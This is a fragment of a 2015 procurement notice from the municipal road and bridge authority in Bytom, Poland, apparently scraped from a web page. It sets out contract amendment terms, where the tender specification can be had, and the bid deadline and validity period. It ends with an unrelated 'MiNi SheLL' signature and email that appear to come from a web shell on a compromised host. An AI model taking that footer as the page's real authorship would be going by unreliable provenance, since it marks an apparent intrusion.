<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem niżej określonych możliwości i warunków dokonania takiej zmiany tj.:
1)	Zamawiający przewiduje możliwość zmiany strony umowy tj. następstwo prawne wynikające 
z odrębnych przepisów, 
2)	Zamawiający przewiduje możliwość dokonania zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu prac, bądź wprowadzenia podwykonawcy,
3)	konieczne zmiany spowodowane wystąpieniem innych okoliczności zewnętrznych niezależnych 
od Wykonawcy i Zamawiającego, zabezpieczające należyte wykonywanie umowy.
2.	Dokonanie zmiany umowy wymaga pisemnego wniosku wskazującego zasadność jej wprowadzenia 
i zgody drugiej strony na jej dokonanie. 
3.	Jakiekolwiek zmiany umowy nie powodują zmiany wynagrodzenia Wykonawcy. 
4.	Jakiekolwiek zmiany umowy pod rygorem nieważności wymagają zachowania formy pisemnej w postaci aneksu, z zastrzeżeniem sytuacji, o której mowa w § 3 ust. 3 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdim.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg i Mostów, 41-902 Bytom, ul. Smolenia 35 (II piętro - Dział Zamówień Publicznych i Archiwizacji Dokumentacji - pok. 219).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2015 godzina 12:00, miejsce: Miejski Zarząd Dróg i Mostów, 41-902 Bytom, ul. Smolenia 35 (II piętro - Dział Zamówień Publicznych i Archiwizacji Dokumentacji - pok. 219)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com